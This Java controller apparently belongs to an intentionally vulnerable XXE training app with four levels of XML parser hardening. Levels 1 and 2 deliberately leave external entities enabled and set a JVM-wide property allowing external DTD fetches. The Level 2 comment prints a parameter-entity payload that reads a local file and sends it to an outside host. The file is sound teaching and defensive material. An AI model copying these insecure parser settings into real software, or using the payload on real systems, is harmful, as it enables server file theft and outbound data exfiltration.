package org.sasanlabs.service.vulnerability.xxe;
import java.io.InputStream;
import javax.servlet.http.HttpServletRequest;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Source;
import javax.xml.transform.sax.SAXSource;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.sasanlabs.internal.utility.LevelConstants;
import org.sasanlabs.internal.utility.Variant;
import org.sasanlabs.internal.utility.annotations.AttackVector;
import org.sasanlabs.internal.utility.annotations.VulnerableAppRequestMapping;
import org.sasanlabs.internal.utility.annotations.VulnerableAppRestController;
import org.sasanlabs.service.vulnerability.bean.GenericVulnerabilityResponseBean;
import org.sasanlabs.service.vulnerability.xxe.bean.Book;
import org.sasanlabs.service.vulnerability.xxe.bean.ObjectFactory;
import org.sasanlabs.service.vulnerability.xxe.dao.BookEntity;
import org.sasanlabs.service.vulnerability.xxe.dao.BookEntityRepository;
import org.sasanlabs.vulnerability.types.VulnerabilityType;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.RequestMethod;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
/**
* Resources referred to while writing this vulnerability. <br>
* General XXE: <br>
* 1. https://www.youtube.com/watch?v=DREgLWZqMWg <br>
* 2. https://portswigger.net/web-security/xxe <br>
* 3. https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9 <br>
*
* <p>Parameter Entities attack:<br>
* 1. https://securitylab.github.com/research/restlet_xxe_vulnerability_CVE-2017-14949 <br>
*
* <p>Prevention technique: <br>
* 1.
* https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
* <br>
*
* @author KSASAN [email protected]
*/
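@VulnerableAppRestController(descriptionLabel = "XXE_VULNERABILITY", value = "XXEVulnerability")
public class XXEVulnerability {

    private static final Logger LOGGER = LogManager.getLogger(XXEVulnerability.class);

    /** Xerces/JDK SAX feature URIs used by the SAX-backed levels below. */
    private static final String FEATURE_EXTERNAL_GENERAL_ENTITIES =
            "http://xml.org/sax/features/external-general-entities";

    private static final String FEATURE_EXTERNAL_PARAMETER_ENTITIES =
            "http://xml.org/sax/features/external-parameter-entities";

    private static final String FEATURE_DISALLOW_DOCTYPE_DECL =
            "http://apache.org/xml/features/disallow-doctype-decl";

    private static final String FEATURE_LOAD_EXTERNAL_DTD =
            "http://apache.org/xml/features/nonvalidating/load-external-dtd";

    /** Persists the {@link Book} parsed at each level; injected by the container. */
    private final BookEntityRepository bookEntityRepository;

    /**
     * Creates the controller.
     *
     * <p>WARNING - intentionally insecure and JVM-wide: {@code javax.xml.accessExternalDTD} is a
     * System property, so setting it to {@code "all"} relaxes the JAXP restriction on fetching
     * external DTDs/entities for every XML parser created in this process, not just the ones in
     * this class. It is set here only so that the Level 1/2 payloads can actually read server
     * files and make outbound HTTP calls. Never do this in a real application.
     *
     * @param bookEntityRepository repository the parsed books are saved to
     */
    public XXEVulnerability(BookEntityRepository bookEntityRepository) {
        System.setProperty("javax.xml.accessExternalDTD", "all");
        this.bookEntityRepository = bookEntityRepository;
    }

    /**
     * Level 1 - no XXE protection.
     *
     * <p>The raw request body is unmarshalled by a default JAXB {@link Unmarshaller}; no parser
     * feature is configured, so DOCTYPE declarations and both general and parameter entities are
     * processed with the parser's defaults. Together with the System property set in the
     * constructor this lets an attacker-controlled {@code <!DOCTYPE>} read local files and make
     * outbound requests from the server.
     *
     * @param request POST whose body is the XML {@code <book>} document
     * @return HTTP 200 with the parsed book and {@code true}, or {@code null}/{@code false} if
     *     parsing or persistence failed (the HTTP status is 200 in both cases)
     */
    @AttackVector(vulnerabilityExposed = VulnerabilityType.XXE, description = "XXE_NO_VALIDATION")
    @VulnerableAppRequestMapping(
            value = LevelConstants.LEVEL_1,
            htmlTemplate = "LEVEL_1/XXE",
            requestMethod = RequestMethod.POST)
    public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel1(
            HttpServletRequest request) {
        try {
            JAXBContext context = JAXBContext.newInstance(ObjectFactory.class);
            Unmarshaller unmarshaller = context.createUnmarshaller();
            // Assumes ObjectFactory's root element maps to Book; any other root fails the cast
            // with a ClassCastException, which the catch below turns into an "invalid" response.
            @SuppressWarnings("unchecked")
            JAXBElement<Book> parsed =
                    (JAXBElement<Book>) unmarshaller.unmarshal(request.getInputStream());
            return persistAndRespond(parsed.getValue(), LevelConstants.LEVEL_1);
        } catch (Exception e) { // HTTP boundary: every failure is reported as an invalid response
            return failureResponse(LevelConstants.LEVEL_1, e);
        }
    }

    /**
     * Parses the request body with the supplied (already configured) {@link SAXParserFactory},
     * saves the resulting book under {@code level} and builds the success response.
     *
     * <p>Routing the parse through a {@link SAXSource} built from the factory's own
     * {@code XMLReader} is what makes the factory's feature settings apply; Level 1, which calls
     * {@code unmarshal(InputStream)} directly, never goes through such a reader.
     *
     * @param spf factory whose XMLReader will do the parsing
     * @param in raw request body
     * @param level level label stored with the book
     * @return HTTP 200 carrying the parsed book
     * @throws JAXBException if the document does not unmarshal to a book
     * @throws SAXException if the parser rejects the document
     * @throws ParserConfigurationException if the factory cannot create a parser
     */
    private ResponseEntity<GenericVulnerabilityResponseBean<Book>> saveJaxBBasedBookInformation(
            SAXParserFactory spf, InputStream in, String level)
            throws JAXBException, SAXException, ParserConfigurationException {
        JAXBContext context = JAXBContext.newInstance(ObjectFactory.class);
        Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(in));
        Unmarshaller unmarshaller = context.createUnmarshaller();
        // Same root-element assumption as Level 1: a non-Book root fails the cast.
        @SuppressWarnings("unchecked")
        JAXBElement<Book> parsed = (JAXBElement<Book>) unmarshaller.unmarshal(xmlSource);
        return persistAndRespond(parsed.getValue(), level);
    }

    /**
     * Saves {@code book} under {@code level} and builds the success response shared by all levels.
     *
     * @param book parsed book (may be whatever the unmarshaller produced; not validated here)
     * @param level level label stored with the entity
     * @return HTTP 200 with the book and {@code true}
     */
    private ResponseEntity<GenericVulnerabilityResponseBean<Book>> persistAndRespond(
            Book book, String level) {
        bookEntityRepository.save(new BookEntity(book, level));
        return new ResponseEntity<>(
                new GenericVulnerabilityResponseBean<Book>(book, true), HttpStatus.OK);
    }

    /**
     * Logs a failed request (with its stack trace) and builds the "invalid" response every level
     * returns on error. Note the status is still HTTP 200; only the payload flags the failure.
     *
     * @param level level label, for the log line only
     * @param e the failure
     * @return HTTP 200 with a {@code null} book and {@code false}
     */
    private static ResponseEntity<GenericVulnerabilityResponseBean<Book>> failureResponse(
            String level, Exception e) {
        LOGGER.error("XXE " + level + " request could not be processed", e);
        return new ResponseEntity<>(
                new GenericVulnerabilityResponseBean<Book>(null, false), HttpStatus.OK);
    }

    /**
     * Level 2 - only external <em>general</em> entities are disabled; still vulnerable.
     *
     * <p>External <em>parameter</em> entities ({@code <!ENTITY % name SYSTEM "...">}) are still
     * resolved, and from inside a DTD they can read a file and ship its contents to an
     * attacker-controlled host via an outbound HTTP call. An external DTD along the lines of
     *
     * <pre>{@code
     * <!ENTITY % file SYSTEM "file:///etc/notify.conf">
     * <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'https://www.google.com/?x=%file;'>">
     * %eval;
     * %exfiltrate;
     * }</pre>
     *
     * pulled in from the request body as
     *
     * <pre>{@code
     * <?xml version="1.0" encoding="UTF-8"?>
     * <!DOCTYPE root [ <!ENTITY % param1 SYSTEM "<location of a DTD like the one above>"> %param1; ]>
     * <book><name>singh</name><isbn>isbn</isbn><author>author</author><publisher>exf</publisher></book>
     * }</pre>
     *
     * shows that disabling general entities alone does not stop XXE.
     *
     * <p>No level covers a lower-case {@code <!doctype>}: per the original author's note the
     * parser rejects it, so it is not a bypass.
     *
     * @param request POST whose body is the XML {@code <book>} document
     * @return HTTP 200 with the parsed book and {@code true}, or {@code null}/{@code false} on
     *     failure
     */
    @AttackVector(
            vulnerabilityExposed = VulnerabilityType.XXE,
            description = "XXE_DISABLE_GENERAL_ENTITY")
    @VulnerableAppRequestMapping(
            value = LevelConstants.LEVEL_2,
            htmlTemplate = "LEVEL_1/XXE",
            requestMethod = RequestMethod.POST)
    public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel2(
            HttpServletRequest request) {
        try {
            // Only external GENERAL entities are disabled here - parameter entities and the
            // external DTD subset are still loaded, which is exactly the gap this level shows.
            SAXParserFactory spf = SAXParserFactory.newInstance();
            spf.setFeature(FEATURE_EXTERNAL_GENERAL_ENTITIES, false);
            return saveJaxBBasedBookInformation(spf, request.getInputStream(), LevelConstants.LEVEL_2);
        } catch (Exception e) { // HTTP boundary: every failure is reported as an invalid response
            return failureResponse(LevelConstants.LEVEL_2, e);
        }
    }

    /**
     * Level 3 (secure variant) - configuration for applications that genuinely need DOCTYPE
     * declarations.
     *
     * <p>External general entities, external parameter entities and loading of the external DTD
     * subset are all disabled, matching the "DTDs required" configuration of the OWASP XXE
     * prevention cheat sheet referenced at the top of this file and the hardened set Level 4
     * applies. This removes the external-entity vectors (local file read, SSRF, out-of-band
     * exfiltration).
     *
     * <p>Caveat: the DOCTYPE itself is still accepted, so internal entity declarations are still
     * expanded; protection against entity-expansion DoS ("billion laughs") rests on whatever
     * expansion limits the JDK parser enforces, not on this configuration. Prefer Level 4 whenever
     * a DOCTYPE is not needed.
     *
     * <p>NOTE(review): this level is {@code Variant.SECURE} yet still carries
     * {@code @AttackVector}; it is kept because the annotation may drive the level listing -
     * confirm whether that is intended.
     *
     * @param request POST whose body is the XML {@code <book>} document
     * @return HTTP 200 with the parsed book and {@code true}, or {@code null}/{@code false} on
     *     failure
     */
    @AttackVector(
            vulnerabilityExposed = VulnerabilityType.XXE,
            description = "XXE_DISABLE_GENERAL_AND_PARAMETER_ENTITY")
    @VulnerableAppRequestMapping(
            value = LevelConstants.LEVEL_3,
            htmlTemplate = "LEVEL_1/XXE",
            requestMethod = RequestMethod.POST,
            variant = Variant.SECURE)
    public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel3(
            HttpServletRequest request) {
        try {
            SAXParserFactory spf = SAXParserFactory.newInstance();
            spf.setFeature(FEATURE_EXTERNAL_GENERAL_ENTITIES, false);
            spf.setFeature(FEATURE_EXTERNAL_PARAMETER_ENTITIES, false);
            // Also refuse to fetch the external DTD subset referenced by <!DOCTYPE x SYSTEM "...">,
            // as the OWASP cheat sheet recommends whenever DOCTYPEs must remain allowed.
            spf.setFeature(FEATURE_LOAD_EXTERNAL_DTD, false);
            return saveJaxBBasedBookInformation(spf, request.getInputStream(), LevelConstants.LEVEL_3);
        } catch (Exception e) { // HTTP boundary: every failure is reported as an invalid response
            return failureResponse(LevelConstants.LEVEL_3, e);
        }
    }

    /**
     * Level 4 (secure variant) - recommended configuration when no DOCTYPE is required.
     *
     * <p>{@code disallow-doctype-decl} makes the parser reject any {@code <!DOCTYPE>} up front, so
     * no entity - internal or external - can be declared at all; this is the primary defence. The
     * remaining three features are defence in depth should the first one ever be relaxed.
     *
     * @param request POST whose body is the XML {@code <book>} document
     * @return HTTP 200 with the parsed book and {@code true}, or {@code null}/{@code false} on
     *     failure (a document carrying a DOCTYPE is rejected and lands here)
     */
    @VulnerableAppRequestMapping(
            value = LevelConstants.LEVEL_4,
            htmlTemplate = "LEVEL_1/XXE",
            requestMethod = RequestMethod.POST,
            variant = Variant.SECURE)
    public ResponseEntity<GenericVulnerabilityResponseBean<Book>> getVulnerablePayloadLevel4(
            HttpServletRequest request) {
        try {
            SAXParserFactory spf = SAXParserFactory.newInstance();
            spf.setFeature(FEATURE_DISALLOW_DOCTYPE_DECL, true); // primary defence
            spf.setFeature(FEATURE_EXTERNAL_GENERAL_ENTITIES, false);
            spf.setFeature(FEATURE_EXTERNAL_PARAMETER_ENTITIES, false);
            spf.setFeature(FEATURE_LOAD_EXTERNAL_DTD, false);
            return saveJaxBBasedBookInformation(spf, request.getInputStream(), LevelConstants.LEVEL_4);
        } catch (Exception e) { // HTTP boundary: every failure is reported as an invalid response
            return failureResponse(LevelConstants.LEVEL_4, e);
        }
    }
}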